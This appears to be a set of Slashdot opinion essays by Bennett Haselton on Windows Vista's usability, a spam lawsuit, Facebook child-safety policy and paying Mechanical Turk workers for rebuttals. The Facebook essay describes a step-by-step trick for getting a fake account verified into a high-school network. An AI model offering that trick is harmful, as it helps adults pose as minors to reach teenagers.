Since TV/PC integration is a major selling point for Vista, I thought this last issue was worth looking harder at: Do people really want to use their computers to watch TV? My computer monitor is in an office where I sit up close when I'm working; but TV feels more comfortable to watch from several feet away, and in my office I can't even scoot my chair back that far. (And if I lived with family, I doubt they'd want to crowd into my office to watch a movie.) In fact, I like the psychological separation of the TV set in the living room from the distractions of the computer in the office: I go in there when I'm done with everything in here. The only way I'd regularly download and watch movies would be if I had a way to send them wirelessly to my TV, but a wireless PC-to-TV converter and the corresponding receiver together cost about $200.
Seeking more validation of my opinions from strangers, I did another survey of 30 Mechanical Turk users, asking if they would rather drive to a movie rental store or download a movie online for the same price. Almost half (14) said they'd rather drive to the movie store, citing the comfort of watching the movie on their TV as opposed to on the computer. Another fourth of the respondents (8) said they'd download the movie but only if they could send the content to their TV to watch, and only the last fourth (8) said they'd actually watch it on their computer monitor. So the future of convergence between PC and TV will probably be not in all-in-one systems but in devices that link the PC in your study with the TV in your living room, and since there's no household name yet for PC-to-TV linkage, the field is wide open for some lucky company to make a product that becomes synonymous with the concept, the way "TiVo" is easier to say than "Digital Video Recorder". Maybe that will be a boost for systems like Vista. If that happens at about the same time that a Vista successor is released that makes the interface easier to switch to from XP, I'll bet that will be the tipping point that gets people switching voluntarily. (Of course many people will switch by then just because they need a new computer and they couldn't find one with anything but Vista on it.)
Anyway, I was only trying a new Vista machine because the hard drive on my old computer died, but after all the data had been recovered, I just installed a new drive in the old machine and went back to XP, while my Vista machine was returned to its perch, gargoyle-like, on the shelves at Circuit City, waiting to pounce on the next unsuspecting wretch with dreams of self-improvement through newer computer purchases. The only remnant of Vista that I have left is IE7, which was installed by my Windows XP restore disk and can't be removed, and which is incompatible with some sites and programs that I need, so I've been using Firefox more and getting to like it. That's lucky, since I've already offended the loyal software-logo-wearing constituencies of Vista and Linux, and wouldn't want to deal with the Firefox crowd too. As my friend Anne Mitchell says, "Admitting you hate Firefox is almost as bad as admitting to being Republican." (Except that when Firefox screws with a page, the chat logs don't end up on national television. Ba-dump-bump!)
-
Hostile ta Vista, Baby
Frequent Slashdot contributor Bennett Haselton adds his experience to the litany of woes with Microsoft Vista. Unlike most commentators who have a beef with the operating system, Bennett does a bit of surveying to bolster his points. Read his account by clicking on the magic link.
My brand-new-out-of-the-box Windows Vista machine could not access www.facebook.com. A nearby XP machine could, but the Vista machine couldn't. I went back to Circuit City to try out the other Vista demo machines, and they could access other sites but not Facebook, either. And that honeymoon feeling that you get when you buy a new computer and expect it to solve all your problems, was over for me. Having built my latest career on helping people access Facebook where they were blocked from it, by some cosmic joke was Vista now blocking me from getting to Facebook on my own machine?
I know, another article bashing Vista, what could be more banal. (Kids! That word, meaning "trite" or "unoriginal", is pronounced "ba-NAHL". If you say it the wrong way like I did in an interview, it sounds naughty and you sound stupid.) But in my own random survey of 30 Vista users on Amazon's Mechanical Turk service (a handy way to check these things), three quarters (23) said the only reason they were using Vista was that the PC store they went to didn't sell XP machines any more, and about half of all respondents (14) said that they would go back to Windows XP if they could. So I don't want to get a bunch of e-mails with Ron Paul links in the signature saying "Nobody has to use Vista if they don't want to!" (I'm aware that a survey of 30 people is too small to be scientific, but it's enough to get a ballpark figure for about $5 on Mechanical Turk.) Besides, the more people write testimonials to what they found frustrating about Vista, the more likely it is that some future version will keep what is good about the new OS, while providing a less frustrating interface (suggested name: "Vista 98").
It turns out the Facebook issue was not really Microsoft's fault -- www.facebook.com had a broken IPv6 record, and Vista defaults to using IPv6 where XP used IPv4, so that's why the host wasn't working. (In case you run into this with any other Web sites on Vista, I fixed the problem by disabling IPv6 in network settings and rebooting.) But it was one more example of something that used to work pre-Vista and then stopped working, and every case like that adds up to the overall frustration of switching to a new system, regardless of whose fault it is.
I hasten to add that I am not some partisan Microsoft basher. I like XP just fine, never more than when I went back to it after a few days on Vista, and I still think for that matter that Vista would be easier to switch to than Linux. Having been involved for years with free speech activism, I run into a lot of people in the same circles who are strong Linux advocates, apparently because the concept of "freedom of speech" is closely aligned with "making every file search as simple and stress-free as a Hamas hostage negotiation". So every year or two I'll try out the latest version of some Linux distro to see how long it would take to get used to it. In 2005, full of optimism, I cheerfully booted up the latest version of Shrike, then tried to find a directory and discovered I could not right-click on the hard drive root dir and specify the name of a directory I wanted to search for (that only worked for files, not directories). I posted a query to a Linux newsgroup, and a respondent told me that the solution was to open a command prompt and type "man find", which I am aware is a polite way of saying "screw you, newbie", but which I dutifully followed anyway and got an output screen of which the first paragraph was:
find searches the directory tree rooted at each given file name by evaluating the given expression from left to right, according to the rules of precedence (see section OPERATORS), until the outcome is known (the left hand side is false for and operations, true for or), at which point find moves on to the next file name.
and that was all my Linux for that year. Maybe I'm overdue to try it again. (Microsoft gives away their Virtual PC program that makes it easy to try other operating systems; I think it's a ploy to make us appreciate Windows more.) Now, I love the concept of a freely-distributable, freely-modifiable operating system, and I've recommended Linux to people when you need it to do something cool that Windows can't do, like bypassing Windows security by booting a PC from a CD. And it's done a lot of good for organizations like the One Laptop Per Child program, which can keep their costs down by using a free operating system. But to this day I've never heard an answer to one question: Since even Linux advocates admit that it's harder to use, what can you do with Linux that you can't do with Windows, to make it worth switching over to? If I was nervous about Vista because some of the interface had changed and some of my old programs no longer worked, it wasn't helpful to tell me to switch to a system where all of the interface would change and none of my old programs would work.
So, I wanted to like Vista. I knew that eventually everyone would have to upgrade anyway, so, not wanting to be left behind, I wanted to switch to Vista because of the same factor that spammers use to get your attention: "Other guys are improving themselves, why aren't you?" But there were some things I ran into almost immediately:
- Windows Explorer and Internet Explorer no longer have the "File / Edit / View" menu bars across the top of the window. Was this a big problem under XP? When the menus gave quick, two-click access to most actions that you could take within the application, was there a grassroots movement to have them removed? I did eventually find that you can hit the "Alt" key to bring the menus back, but why put people through that frustration? The most annoying feeling while using a computer is being yanked out of thinking about what you're doing with the computer to having to concentrate on how to use it.
Perhaps the idea was to steer users towards using the buttons on the toolbar, but there aren't enough buttons to cover all the options located under the menus. If the UI designers wanted to steer users gently towards using the buttons, my suggestion would have been: Whenever the user picks something under a menu that corresponds to something accessible from the toolbar, display a dialog box which says for example, "In the future, you can print faster by clicking the printer button on the toolbar", along with a picture (and a "Do not show this message again" checkbox -- important!).
- Windows Explorer also did away with the "Up" button that lets you browse from the current directory to the higher-level directory. Again, probably not in response to a groundswell of users demanding for that button to be removed, when it took up about one square centimeter of screen space. Supposedly Windows Explorer makes up for this by displaying the entire path to the current directory in the address bar, so that if the path is "C:\Financial Records\Chris Pirillo\ Pectoral Real Estate\", you can click on "Chris Pirillo" to go one directory higher. The trouble is that I frequently give my directories extremely long and descriptive names like (this is a real example) "Flash-Player-8.5.0.246-beta2.downloaded-2006-03-20-from-labs.macromedia.com" so that I can keep track of where and when I got each piece of downloaded software, in case I ever need to go back to a previous version that the software maker no longer makes available because they're trying to steer me away from it (ironically, "Vista syndrome"). With a directory that has a long name like that, the higher-level directories aren't visible in the address bar, so I had to locate it manually in the left-hand tree view panel. OK, knock off the violins, the point is that I didn't have to do that in XP.
- I have an older monitor, so I wanted to turn ClearType off. The IE7 help file describes how to do this in IE, but that didn't work for me no matter how many times I tried, and my eyes were aching by the time I found out that in Vista it's a default system-wide setting that overrides IE's setting until you change the system-wide one. I would have suggested putting one line in the IE7 help file: "Note: if your operating system such as Windows Vista is set to use ClearType system-wide, you must disable this as well to disable ClearType in IE."
- Virtual PC, which worked on all versions of Windows XP, is not supported on Vista Home Premium. I need Virtual PC (for reasons other than Linux-bashing), so this was a deal-breaker.
- Telnet no longer installed by default. Even though I use a different telnet program for regular use, telnet.exe was handy to test whether a remote machine was reachable on a given port. (For example, in a command prompt, type "telnet www.yahoo.com 80" and when the command prompt screen goes blank, that means the machine www.yahoo.com is accepting responses on port 80, the standard port for Web traffic. Try connecting to port 81 instead, and you get no response on that port. This can be useful when diagnosing problems with Web servers and other programs.) Even though it's not hard to get telnet back, why would they go to the trouble of removing it?
- The aforementioned Facebook problem. This seemed so startling at the time that I almost stopped everything to write an article just about that, musing on Microsoft having so much power that all PC stores were now exclusively stocking computers running an OS that, at the time anyway, couldn't access Facebook. But then I asked another bunch of users on Mechanical Turk, and all respondents using Vista said they could access Facebook after all. Of course, this wasn't a random sample, since users who bought Vista and couldn't access Facebook, probably would have returned their machines a long time ago, but I'm still not sure what caused it to work on some machines and not others -- all I know is that Facebook was inaccessible until I disabled IPv6.
I know Facebook is reading these articles, since in November I wrote about how you could circumvent Facebook's system of verifying that users were real high school students, by doing the following: "(1) create a profile of a non-overweight girl and sign up as a member of a high school network, pending confirmation; (2) search for several boys in that network and send them friend requests; and (3) wait for at least one of them to confirm you back". Shortly afterwards, Facebook changed the verification system, so that now, if you're confirming someone who is a pending member of a high school network but no one else has confirmed them yet, Facebook warns you, "Only check this box if you're absolutely sure that you know this person." So, whichever of Mark Zuckerberg's friends is reading my articles: Clever idea, and, keep the IPv6 records working.
That was as far as I got before I stopped trying to get used to Vista and started taking notes for this article (working title: "Vist Vucked"). From the Mechanical Turk users who responded to my survey, the other most common reported problems were: software compatibility, hardware compatibility, difficulty with the UI, and running too slowly. Presumably the first two problems will improve over time, but the UI will always be hard to switch to as long as users can't find functions that were easily locatable in the old interface, and if it runs slower than XP, that will always be a factor no matter how fast your computer is. (However fast it runs Vista, you'd always be able to make it run even faster with XP instead!)
The best things I've heard about Vista have been that (a) it is the most secure Windows ever (which Dave Barry says is like calling asparagus the "most articulate vegetable ever"), and (b) it features better multimedia integration. To which my responses were: (a) the number of incomprehensible warnings that Vista flashes at a user whenever they look at the computer funny, does not make it more secure, because users will condition themselves to just ignore those warnings, and (b) I hate watching TV on my computer anyway.
Since TV/PC integration is a major selling point for Vista, I thought this last issue was worth looking harder at: Do people really want to use their computers to watch TV? My computer monitor is in an office where I sit up close when I'm working; but TV feels more comfortable to watch from several feet away, and in my office I can't even scoot my chair back that far. (And if I lived with family, I doubt they'd want to crowd into my office to watch a movie.) In fact, I like the psychological separation of the TV set in the living room from the distractions of the computer in the office: I go in there when I'm done with everything in here. The only way I'd regularly download and watch movies would be if I had a way to send them wirelessly to my TV, but a wireless PC-to-TV converter and the corresponding receiver together cost about $200.
Seeking more validation of my opinions from strangers, I did another survey of 30 Mechanical Turk users, asking if they would rather drive to a movie rental store or download a movie online for the same price. Almost half (14) said they'd rather drive to the movie store, citing the comfort of watching the movie on their TV as opposed to on the computer. Another fourth of the respondents (8) said they'd download the movie but only if they could send the content to their TV to watch, and only the last fourth (8) said they'd actually watch it on their computer monitor. So the future of convergence between PC and TV will probably be not in all-in-one systems but in devices that link the PC in your study with the TV in your living room, and since there's no household name yet for PC-to-TV linkage, the field is wide open for some lucky company to make a product that becomes synonymous with the concept, the way "TiVo" is easier to say than "Digital Video Recorder". Maybe that will be a boost for systems like Vista. If that happens at about the same time that a Vista successor is released that makes the interface easier to switch to from XP, I'll bet that will be the tipping point that gets people switching voluntarily. (Of course many people will switch by then just because they need a new computer and they couldn't find one with anything but Vista on it.)
Anyway, I was only trying a new Vista machine because the hard drive on my old computer died, but after all the data had been recovered, I just installed a new drive in the old machine and went back to XP, while my Vista machine was returned to its perch, gargoyle-like, on the shelves at Circuit City, waiting to pounce on the next unsuspecting wretch with dreams of self-improvement through newer computer purchases. The only remnant of Vista that I have left is IE7, which was installed by my Windows XP restore disk and can't be removed, and which is incompatible with some sites and programs that I need, so I've been using Firefox more and getting to like it. That's lucky, since I've already offended the loyal software-logo-wearing constituencies of Vista and Linux, and wouldn't want to deal with the Firefox crowd too. As my friend Anne Mitchell says, "Admitting you hate Firefox is almost as bad as admitting to being Republican." (Except that when Firefox screws with a page, the chat logs don't end up on national television. Ba-dump-bump!)
-
Judge Rules That I Own Slashdot
Bennett Haselton wrote in with this week's amusing and shocking story of high finance, judicial discretion, and oh so much more... he writes "People still ask me if I make enough money suing spammers in Small Claims court to make it worthwhile. I say: What about the entertainment value? Recently I received an e-mail with the subject line: 'Reminder: Link exchange with your site http://slashdot.org' Finally, I thought, someone else who agrees that I'm carrying the site's entire success on my shoulders. I even hurried off to check the registration of the slashdot.org domain to see if they had made the transfer official in honor of my contributions, but apparently the domain is still being squatted by some outfit calling itself "SourceForge"." I'm shocked that a legitimate businessman would make such an error. Read on to see what Bennett does about it.
So I returned to the e-mail, which began, "Dear Webmaster". Scrolling through it, I found the part that I was looking for (I munged the sender's URL slightly, to avoid crashing the poor guy's server from all the traffic I'm sure he's already getting):
As you know, reciprocal linking benefits both of us by raising our search rankings and generating more traffic to both of our sites. Please post a link to my site as follows:
Title: Work At Home Business Opportunities | Online Career Training
URL: http://www.theeashblahblah.com/
Description: Your Source, and Resource for starting a Home Business, or Growing the One You're In.
Of course I am always interested in growing the business that I'm in, which is why I served him with papers a few days later under RCW 19.190, the Washington anti-spam law which prohibits e-mails with a "false or misleading subject line".
OK, technically at this point suing spammers in Small Claims is really more of a hobby. I still think that the real future of spammer-suing is in federal court, if you can amass enough damages against a particular company to reach the threshold of $75,000 to bring a federal lawsuit. The idea is not to go after the bottom-feeders who are sending the actual spams from their Mom's basement, but to follow the money and see who is ultimately buying the leads. You can respond to mortgage spams by entering a drop-box phone number and a made-up name, waiting to see who calls you, and then telling them that the person who sold them that lead is generating them illegally and that they shouldn't buy leads from them any more. Next I'll probably try responding to some ads for pills or other shady products by using a temporary one-time-use credit card number that's only authorized up to the amount of the purchase, to see which companies are doing the sales on the back end. (The checkout forms for those pill-hawking pages rarely say the name of the company that will end up on your statement, but the charge on your card has to be from someone.) The only types of spam I can think of where "following the money" wouldn't work, would be pump-and-dump stock spams -- in that case, the beneficiary could be anyone holding stock in the company. The SEC can freeze trading in stocks that are promoted in pump-and-dump but it's still no guarantee of catching the guilty party -- even someone who buys a lot of the company might just be an "innocent" third party who knows it's a scam but hopes to cash in on the price spike (although FAQs suggest that this strategy doesn't work). But for other types of spam, it's already been well documented how you can track it to the financiers without even trying to identify the actual person who pressed "Send".
Of course there's another reason why you'd rather be in federal court. Small Claims anti-spammer cases may not shed a lot of light on the economics behind spam, but they are instructive for what to expect if you ever appear before a District Court judge for any other reason. In this trial, heard by Judge Judith Eiler on November 5, 2007, the defendant telephoned in to the court hearing and said several times that this was a "personal e-mail from me to him" and should be exempt from the anti-spam laws. I said that I didn't think an e-mail with the subject "Link exchange with your site http://slashdot.org" could be considered "personal" since nobody who knew me would think that was my website, and in any case, personal e-mails tend not to start with "Dear Webmaster". But Judge Eiler ruled that this was a personal e-mail after all:
"Um, spam, these are anti-spam laws, which imply that they are mail just sent out in huge bulks, which would be the antithesis of a personal e-mail. And here he puts his name, in fact this is the person that you directly sued rather than somebody that's in a corporation or a company. The court does think that there's some indication that this is a personal-type e-mail. While it may have gone out to a number of people, it doesn't have quite the earmarks."
mp3 here
Below is a copy of the e-mail that the judge was holding when she ruled that it "didn't have the earmarks" of a bulk e-mail:
To: bennett@peacefire.org
Subject: Reminder: Link exchange with your site http://slashdot.org
X-PHP-Script: www.theeashblahblah.com/linkmachine/auto.php for 87.102.22.100
Date: Wed, 12 Sep 2007 09:34:26 -0400
From: Roderick Eash
Reply-to: reash@tconl.com
Message-ID:
X-Priority: 3
X-Mailer: PHPMailer [version 1.72]
Errors-To: reash@tconl.com
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1_b43cabef83c9f9123db7a78ef9a73362"

Dear Webmaster,

My name is Roderick Eash, and I run the web site Work At Home Business Opportunities | Online Career Training: http://www.theeashblahblah.com/

The other day I wrote you to let you know I'm very interested in exchanging links. I'm sending this reminder in case you didn't receive my first letter.

I've gone ahead and posted a link to your site, on this page: http://www.theeashblahblah.com/linkmachine/resources/resources_home_based_business_41.html

As you know, reciprocal linking benefits both of us by raising our search rankings and generating more traffic to both of our sites. Please post a link to my site as follows:

Title: Work At Home Business Opportunities | Online Career Training
URL: http://www.theeashblahblah.com/
Description: Your Source, and Resource for starting a Home Business, or Growing the One You're In.

Once you've posted the link, let me know the URL of the page that it's on, by entering it in this form: http://www.theeashblahblah.com/linkmachine/resources/link_exchange.php?ua=_ua9&site_index=MTg4MTgwMjc%3D

You can also use that form to make changes to the text of the link to your site, if you'd like.

Thank you very much,
Roderick Eash
Every time I write about a spam case, I swear it's the last time. I wonder if judges read that and say to each other, "I'll bet we can get him to do it again." With this ruling, if the subject line "Link exchange with your site http://slashdot.org" is not "false or misleading", does that mean I can claim slashdot.org as my site after all?
So I don't think that suing spammers in Small Claims will make much difference in the long run. But the odds are that you might have a case come before a District Court judge at some point in your life. Consider that the same type of judge who thought the message above was a "personal e-mail", might someday be deciding whether you're responsible for $10,000 in damage to someone's car, or whether there is proof beyond a reasonable doubt that you were guilty of rape, or whether you get to keep custody of your child. There's no joke here, just something I thought you should keep in mind.
So I'm hardly a victim, but it could have been worse; I could have gotten a spam -- excuse me, a personal e-mail -- with a subject like "Your g1rl says you n3ed a b1gger m3mber". I would have been pissed if the judge had ruled that subject line was not misleading.
-
New York's Slap to the Facebook
Frequent Slashdot Contributor Bennett Haselton writes "Last month Facebook had to submit to some ritualistic lashing when New York Attorney General Cuomo accused them of misrepresenting the site's safety features and exposing minors to sexual predators -- thus making it official that "Facebook is the new MySpace". Facebook did agree to make some concessions, mainly responding faster to abuse reports. But would this make any difference, when anyone who loses their account can sign up for a new one instantly? More generally, when politicians beat up on social networking sites, what changes do they want to see made, and why do they think those changes would accomplish anything?" Hit that link below to continue to read what Bennett has to say...
There are three questions that any politician attacking social networking sites, should have to answer, in order to be specific about what they want. First, what kind of contact do they think the social networking sites should prohibit between adults and minors? All politicians agree on prohibiting sexual solicitation, but that's a non-issue since that's already against the law. So are they asking the sites to block adults and minors from messaging each other at all? Or only "flirtatious" messages, or only requests to meet in person? Some of these answers are more ridiculous than others, but let them pick one. Second, if the site does try to monitor for inappropriate contact between adults and minors, is there any practical way to stop someone from falsely signing up as a minor? Third, if someone's account is cancelled for inappropriate behavior, what good does that do when they can just create another one? (Cuomo's office declined to respond to these questions, referring me only to their press releases. Facebook did not respond to requests for comment.)
Complaining about the futility of Internet regulation is about as hard as complaining about media coverage of Paris Hilton. But in this case, it's not merely that the laws wouldn't do any good, it's that I can't see how the political grandstanding could even plausibly lead up to any laws, even stupid ones.
Facebook's big concession in their settlement with Cuomo was that they would respond faster to complaints sent to abuse@facebook.com about inappropriate contact. (Previously, the AG's office had sent test complaints to the abuse@facebook.com address saying things like, "My 13 YEAR OLD received this extremely inappropriate message from a local NYC man. Please take action IMMEDIATEL!" (sic), and received no response.) But what constitutes "abuse"? Facebook's Terms of Service do not mention contact between adults and minors except to say that you may not "solicit personal information from anyone under 18" (as written, this prohibition would apply to everyone, and not just adults). Does that mean you can send flirtatious messages to an underage user as long as you don't ask for contact information (which you wouldn't need to do anyway, if it's posted on their profile and they add you to their friends list)? For that matter, does that mean if you're 18 and you ask a 17-year-old Facebook user for her phone number, you're breaking the rules? (Or, wait, this applies even if you yourself are 17 as well!) Of course there's nothing new about terms of service agreements which are vaguely written and haphazardly enforced, or playing parlor games about how the terms would be absurd if taken literally. But when a government office is threatening to bring charges and possibly push for new laws unless Facebook agrees to enforce its own Terms of Service, then it's fair game to ask exactly what rules the AG's office is asking Facebook to make people follow.
What if Facebook blocked adults from contacting minors at all? Before, I would have assumed that Facebook would respond to this suggestion by saying that it was too draconian, that nobody had ever seriously tried to outlaw all contact between minors and adults on the Internet, etc. But Facebook's Chief Privacy Officer appeared at one point to endorse this policy as reasonable, by saying that, well, they did block adults from messaging minors on the site, even though they didn't. Cuomo's letter pointed out that any Facebook user can message any other user, and they still can. (I asked Facebook if their Chief Privacy Officer was misquoted in the article, but they didn't respond.) So leaving aside the question of whether Facebook should try to stop adults from messaging minors, would it even be possible? Of course you could block registered adult users from messaging registered underage users. But since any adult who planned on doing something suspicious would probably do it from a "throwaway" account instead of their real one, the question is whether you could screen people from creating "throwaway" accounts pretending to be minors -- sort of the opposite of adult credit-card verification for porn sites. (My suggestion: Make the person answer a question like, 'The way to impress a girl in high school is with (a) looks; (b) intelligence; (c) sense of humor; or (d) "confidence"'. From listening to most adults, you'd think they have no clue about the correct answer to this, except for the ones who also add, 'What do you mean, "in high school"?')
Facebook's current screening system is that anyone who registers as a high school student (and if you're under 18, you have to register as a high school or college student -- homeschoolers and dropouts are out of luck unless they lie about their age), has to be confirmed by an existing student at that school, by sending them a friend request and having them confirm that you are friends. (Your account still works before you're confirmed, but you are blocked from certain things that only high school accounts can do, such as browse for other members of that high school.) This is another recent change that Facebook made that was not listed in their settlement agreement -- previously, the Attorney General had documented that anybody under 18 could sign up and join a high school network, but now, you can't do this without getting another student to confirm you.
However, this can be circumvented as well. I'm not endorsing the following trick for any mischief-making, but I think it's sufficiently obvious that there's no reason not to point it out: (1) create a profile of a non-overweight girl and sign up as a member of a high school network, pending confirmation; (2) search for several boys in that network and send them friend requests; and (3) wait for at least one of them to confirm you back, which they will probably do, without even being sure if they actually know you or not. Voila, you've got your "high school student" account. Then you can presumably use that account as a foothold to approve other accounts, for example if you're a male and you want to create a fake high schooler profile as an actual guy, assuming you only want to pretend to be a teenager, not a female, because it's not like you're not some kind of weirdo.
Facebook could conceivably require real-world verification for anyone who signed up as a minor -- confirmation from their school, for example. But this would be competitive suicide for any site whose main draw is that everybody wants to go there because everybody else is already there, so they need signups to be as easy as possible. Even if Congress passed a law draconian enough that it required all social networking sites to do this, Facebook could just re-incorporate overseas (for a billion dollars, wouldn't you move to Canada, Mark?), or else a foreign competitor could take over the teen-social-networking market by offering signups without cumbersome verifications. What would Congress do then, pass a law requiring ISPs to block access to overseas social-networking sites? They couldn't even do that with child pornography.
Finally, if Facebook does cancel your account, you can always sign up for a new one instantly with a new e-mail address. Losing your Facebook account might be a harsh punishment for someone who had built up an extensive network of contacts around their profile. But I'll bet that any adult with a network of friends on Facebook, built around a profile that gives their real name and employer, is probably using a secondary profile with a lot less information on it if they're writing to 13-year-old girls. A dispensable secondary account like that can easily be replaced, so Facebook responding to abuse reports by closing people's accounts is just playing whack-a-mole. An arrest can stop someone permanently, but you can only arrest someone if they've actually broken the law, like sending an unambiguous sexual solicitation to an underage user.
So there's really nothing that Facebook or any other social-networking site could do to prevent adults from signing up as minors, to prevent adults and minors from messaging each other, or to keep abusers from creating new accounts. Occasionally, they are able to make some minor concessions that a politician can take credit for -- in July, the attorney general of Connecticut alerted Facebook to three sex offenders who had profiles on the site, which Facebook duly removed. Did the sex offenders then sign up for new profiles? Are most sex offenders on Facebook smart enough not to sign up under their real names? Story doesn't say. That's one reason I could never make it as a regular reporter, because you're not allowed to insert your own voice into the story even to point out the crashingly obvious.
But basically, the major issues that politicians keep bringing up about social networking sites, are unsolvable. For a politician, of course, this is the best of both worlds -- they can rail against social networking sites forever, knowing that the "problems" will never go away.
This is usually the point at which the writer inserts an obligatory note that the real solution is to sit down and talk to your kids. Well, yes and no. I think first you should be as informed as possible about what the various risks are, not just for online activity but for all of life's experiences, and then sit down and talk. You could even do the research together and make a Family Fun Night out of it! (Sound of teenagers groaning and fumbling for their iPods.) For openers: one study found that in one year in the U.S., "Law enforcement at all levels made an estimated 2,577 arrests for Internet sex crimes against minors", and only 39% of those were for crimes against real, identifiable minors (excluding arrests for To Catch A Predator-style sting operations). On the other hand, the National Transportation Safety Board reports that every year, about 3.4 million people are injured and 41,000 are killed in auto accidents in the U.S. Even this rough comparison would seem to suggest that until you've talked to your kid about every last detail you can think of regarding car safety, that's a better use of time than talking about Facebook. Perhaps you think it's an apples-and-oranges comparison because the sex crimes statistic counts only arrests, not actual incidents. But then the question is whether a true apples-to-apples comparison has ever been done, or how you could do one. The point is that there is some objective truth about the relative risks, and if you read even just one study comparing them, you're better informed than 90% of the people out there, including most parents. You want to be the cool Mom? You don't have to let your kids do everything, just have reasons for stuff!
My promise to my own future kids is that I won't ever make the mistake of thinking that just because I paid for their room and board for a few years, that makes me better informed about the various risk factors of different activities. I will probably be better informed than my kids, for a long while anyway, but that won't be why. And I hope we can teach them so much that before long they'll be better informed than most people, including most of their friends' parents. Then my wife will teach them to be polite enough not to point this out to their friends' parents, but with half their genes coming from me I wouldn't bet on it.
-
Paying People to Argue With You
Bennett Haselton has written in with an essay on a strange experiment on-line. He starts When you first hear about Amazon.com's "Mechanical Turk" service, which allows "requesters" to pay "Turk workers" a few pennies to complete some task which is hard to automate but easy for humans, what's the first application that comes to your mind? The system has been discussed previously on Slashdot, but I'll bet a week's wages for a Mechanical Turk worker ($1.45, according to one of them) that I was the first person who used it to pay people to write rebuttals to one of my arguments. Keep reading unless you want to fight about it.
The interesting result was that some of the rebuttals were quite insightful, and resulted in me making changes to the argument that I would make if I had to present it again. Judging by the literacy and intelligence of some of the respondents, most of them probably wouldn't need Mechanical Turk as a source of income, so I assume most of them fit the profile of this Salon.com writer and are doing it just for fun. Hell, you can find enough people on UseNet and Slashdot who will argue with you just for free.
But there were a few reasons I found this preferable to the conventional ways of gathering interesting rebuttals to your own reasoning. If you send out a sample argument to all of your e-mail buddies, you will probably get some useful replies, but they may start to think you're a little weird for asking them to evaluate your thought processes, especially if you do it over and over. Post an opinion on UseNet or Slashdot, and you may have to wade through a lot of crap to find the useful responses (while others may consider your post to be part of the crap that they have to wade through). And in both cases, there's the potential embarrassment of what you're asking for -- the risk of seeming so uncertain about your own opinions that you want other people to check your work for you. (I actually think that being uncertain about your own beliefs is a virtue, but it doesn't seem to be one that our culture prizes very highly.) Using Mechanical Turk addresses most of these problems; even though you're still admitting to total strangers that you might be wrong and asking them to shoot you down if they can, at least the evidence of your insecurity won't turn up when your next employer or Internet date does a Google search for your name. ("Damn it, I want a man who doesn't question his bumper stickers!")
So, while I didn't find it useful enough that I would run every opinion through the Mechanical Turk machinery to see what feedback I could get from it (I'm not paying a bunch of them to proofread this article), I did like it enough to recommend it to people for certain arguments in certain settings. The main kinds of arguments that I would try out on the Mechanical Turk service would be about abstract philosophical or moral questions on issues that have been around forever, like abortion or the death penalty -- topics so explosive that you'd risk making your friends very uncomfortable if you test-marketed your arguments on them, and which would seem almost rude to post about in a public forum because the debate topics have been around for so very, very long. But on Mechanical Turk, $1 is apparently enough to get people to ignore the awkwardness and the exhaustedness of the topic and to focus on what you ask.
And what was the argument that I used to test it out? Perhaps the geek crowd will feel more sympathy with this than the general public does. Basically it was that the conventional wisdom behind allowing adults to smoke, but banning cigarettes for people under 18, is wrong. Either you can believe that smoking should be permitted for everybody, or that it should be banned for everybody, but there is no consistent set of assumptions that could lead you to conclude that smoking should be banned for people under 18 but allowed for everyone else. You have two groups of people under consideration -- people under 18 who smoke, and people over 18 who smoke. What possible reason could there be for wanting to protect the health of the people in the first group, but not the people in the second group?
The problem with the conventional reason for smoking age restrictions -- "Younger people have worse judgment, so they are more likely to smoke" -- is that if this is true, all that means is that the first group of people will be proportionally larger, relative to the total population of people in their age range. But even after that assumption, you're still left with two groups of people, who exhibit the same continued bad judgment with regard to smoking cigarettes. Treating the two groups differently, is a bit like saying we should have lighter sentences for female murderers than for male murderers, just because men are more likely to commit murder.
And yet this conclusion did give me pause, so this is a classic example of an argument where you'd want someone to check your work. Off I went to create a Human Intelligence Task (HIT) on Mechanical Turk simply asking people to read the argument and respond. In the first round, most responders missed what I thought was the point of the argument, and responded with some variation of "Minors are more likely to smoke because they have worse judgment", without addressing the question of why the two groups of smokers should be treated differently. A few people responded with variations of "We've always done it that way" (referring to similar restrictions on alcohol, pornography, etc.); fair enough, it just reminded me that if I asked the question again I'd have to say I didn't consider any argument valid that boiled down to "We've always done it that way".
But then came some more interesting responses. One worker replied that I was wrong to assume that the effects of a cigarette were "the same" on adults and minors because cigarette smoke has been shown to be more damaging to developing tissues. OK, that was worth a dollar. On the other hand, that just means that there is some number N cigarettes that would be just as harmful to an adult, as 1 cigarette would be to a minor, so you're still left without a consistent reason for why you'd let the adult buy those N cigarettes but prevent the minor from buying 1 cigarette. Then another user called me out on the opening line of my original argument, "There is no reason to ban cigarettes for minors but not for adults." He said, quite correctly, that I had only attempted to debunk the most commonly given reason, but it was wrong to conclude that there was no such reason.
So, this led me to another idea for how to present an argument and solicit feedback on Mechanical Turk: in the form of a series of mathematically precise statements, each one following from the previous ones. The new HIT was to ask users if they disagreed with the conclusion, and if they disagreed, then to identify the first statement that they disagreed with. The idea was that each statement would follow logically from the ones before it, so identifying any statement as the "first" one that they disagreed with, would be tantamount to a self-contradictory paradox.
Now, whether or not you want to use this format when running an argument past the Turk workers, depends on what your goal is. If you want to really find out if your own argument is valid, then breaking it down mathematically is one approach. On the other hand, if you already believe your own argument, and you're just trying to find the most persuasive way of phrasing it, then you may not learn anything useful by breaking it down into a series of mathematical steps, because that's probably not going to be the format of our final persuasive essay.
Anyway, the new mathematical format of the argument was (slightly reworked from what I posted on Amazon):
1. Government should ban smoking by people under 18, because of the harmful health effects.
2. If that's true for the entire group of underage smokers, then it's also true for each individual smoker under 18. In other words, even if only one person under 18 smoked in the entire country, it would still be justified for the government to ban them from smoking.
3. Whatever bad health effects are caused by the average person under 18 smoking 1 cigarette, there is some number N cigarettes that would cause the same bad health effects in the average adult who smoked them.
4. If banning 1 person under 18 from smoking 1 cigarette is justified (even if they were the last smoker on Earth), and the health effects would be the same for an average adult who smoked N cigarettes, then banning 1 adult from smoking those N cigarettes would also be justified (again, even if they were the last smoker on Earth).
5. If banning 1 person over 18 from smoking would be justified, then the same logic would apply to every person over 18, which would imply banning smoking for all people over 18.
6. Hence, if you believe that smoking should be banned for people under 18, then the same logic would lead to a ban on smoking for people over 18 as well.
